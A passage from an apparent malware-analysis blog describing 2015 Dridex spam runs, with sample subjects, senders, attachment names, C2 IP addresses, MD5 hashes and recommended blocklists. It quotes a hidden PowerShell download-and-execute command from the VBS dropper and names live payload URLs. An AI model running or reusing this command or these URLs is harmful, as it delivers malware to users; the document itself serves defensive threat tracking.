46.19.143.151 (Private Layer Inc, Switzerland)
79.149.162.117 (Telefonica Moviles Espana, Spain)
5.135.28.104 (OVH / Simpace.com, UK)

According to this Malwr report it downloads the same Dridex DLL as seen in this spam run plus another variant of the downloader with a detection rate of 3/56.

Recommended blocklist:
188.120.225.17
45.55.154.235
188.126.72.179
1.164.114.195
46.19.143.151
79.149.162.117
5.135.28.104/29
31.41.45.175
91.242.163.78

MD5s:
b4be0bb41af791004ae3502c5531773b
7bede7cc84388fb7bfa2895dba183a20
564597fd05a31456350bac5e6c075fc9

Malware spam "Unpaid Invoice [09876] attached" / "This is your Remittance Advice [ID:12345]" with VBS-in-ZIP attachment

This rather terse spam has no body text and comes from random senders. It has a ZIP attachment which contains a malicious script.

Example subjects include:
Unpaid Invoice [09323] attached
Unpaid Invoice [86633] attached
Unpaid Invoice [35893] attached
This is your Remittance Advice [ID:42667]
This is your Remittance Advice [ID:69951]

Example senders:
SAROSSA PLC
32RED
NOIDA TOLL BRIDGE CO

Example attachment names:
RC422QNSB.zip
ML82034PMRY.zip
MK843NCAK.zip
OI8244LPNH.zip
ZW1760EHOG.zip
MANX FINANCIAL GROUP PLC
RARE EARTH MINERALS PLC

Inside is a malicious VBS script. It is likely that there are several different versions, the one working sample I saw looked like this [pastebin] which is very similar to the VBA macro used in this spam run yesterday.

When run (I don't recommend this!) it executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.202/sqwere/casma.gif','%TEMP%\giuguiGIUGdsuf87t6F.cab'); expand %TEMP%\giuguiGIUGdsuf87t6F.cab %TEMP%\giuguiGIUGdsuf87t6F.exe; Start-Process %TEMP%\giuguiGIUGdsuf87t6F.exe;
Because there are probably several different versions of this script, there are probably several different download locations. In this case, a fake .GIF file is downloaded from a malware server at 193.26.217.202 (Servachok Ltd, Russia) which is actually an .EXE file, but it gets saved as a .CAB file. For no very good reason it is passed through EXPAND which does nothing but save it to %TEMP%\giuguiGIUGdsuf87t6F.exe.

This binary has a detection rate of 4/55. Automated analysis tools [1] [2] [3] [4] show that the malware attempts to phone home to:

188.120.225.17 (TheFirst-RU, Russia)
121.50.43.175 (Tsukaeru.net, Japan)
82.151.131.129 (DorukNet, Turkey)
92.63.88.83 (MWTV, Latvia)
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
199.201.121.169 (Synaptica, Canada)
188.226.129.49 (Digital Ocean, Netherlands)
192.64.11.232 (Synaptica, Canada)
77.74.103.150 (iway AG GS, Switzerland)
1.164.114.195 (Data Communication Business Group, Taiwan)
5.135.28.104 (OVH / Simpace.com, UK)
46.19.143.151 (Private Layer Inc, Switzerland)

It also drops another variant of the same downloader, edg1.exe with a detection rate of 3/56 and a Dridex DLL with a detection rate of 9/56.

Recommended blocklist:
188.120.225.17
121.50.43.175
82.151.131.129
92.63.88.0/24
95.163.121.0/24
199.201.121.169
188.226.129.49
192.64.11.232
77.74.103.150
1.164.114.195
5.135.28.104/29
46.19.143.151

Malware spam: "Batchuser BATCHUSER [ecommsupport@cihgroup.com]" / "CIH Delivery Note 0051037484"

The CIH Group is the name behind the Euronics brand. They are not sending out this spam, instead it is a simple forgery with a malicious attachment.

From:    Batchuser BATCHUSER [ecommsupport@cihgroup.com]
Date:    31 March 2015 at 09:15
Subject:    CIH Delivery Note 0051037484

**********************************************************************
This email and the information it contains are private, may be confidential and are for the intended recipient only. If you received this email in error please notify the sender immediately, confirm that it has been deleted from your system and that all copies have been destroyed. You should not copy it for any purpose or disclose its contents to any other person.
Internet communications are not secure and therefore CIH does not accept legal responsibility for the contents of this message.
We use reasonable endeavours to virus scan all outgoing emails but no warranty is given that this email and any attachments are virus free. You should undertake your own virus checking. We reserve the right to monitor email communications through our networks.
Combined Independents (Holdings) Ltd is registered in England No 767658 and has its registered offices at
Euro House, Joule Road, Andover, SP10 3GD

**********************************************************************
Apart from the disclaimer there is no body text. If you do as the disclaimer says and run attached Word document (CIH Delivery Note 0051037484.doc) through an anti-virus product then it will appear to clean, but it actually contains this malicious macro [pastebin] which downloads a component from:

http://www.tschoetz.de/122/091.exe

This is saved as %TEMP%\stoiki86.exe. There are usually two or three different download locations, but they will all lead to the the same binary which in this case has a detection rate of 5/56.

Various automated analysis tools [1] [2] [3] [4] show traffic to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
37.139.47.81 (Comfortel Ltd / Pirix, Russia)
72.167.62.27 (GoDaddy, US)
212.227.89.182 (1&1, Germany)
46.228.193.201 (Aqua Networks Ltd, Germany)
46.101.49.125 (Digital Ocean Inc, Netherlands)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc, US)
95.211.184.249 (Leaseweb, Netherlands)

According to this Malwr report it also drops another version of the downloader [VT 4/57] and a malicious DLL which will almost definitely be Dridex [VT 2/57].

Recommended blocklist:
91.242.163.70
37.139.47.81
72.167.62.27
212.227.89.182
46.228.193.201
46.101.49.125
198.245.70.182
95.211.184.249

Malware spam: "Australia Post" / "Track Advice Notification: Consignment RYR58947332

This fake Australia Post email leads to malware hosted on Cubby.
From:    Australia Post [noreply@auspost.com.au]
Date:    31 March 2015 at 23:25
Subject:    Track Advice Notification: Consignment RYR5894733

Your parcel (1) has been dispatched with Australia Post.

The courier company was not able to deliver your parcel by your address.

Label is enclosed to the letter. Print a label and show it at your post office.

Label: RYR5894733

To view/download your label please click here or follow the link below :

https://eparceltrack.auspost.com.au/external/webui/aspx?LabelCode=label_5894733


**Please note that this is an automatically generated email - replies will not be answered. 
I have only seen one sample of this and the Cubby download page was showing quota exceed. However, the payload will be identical to the one found in this other Australian-themed spam running concurrently.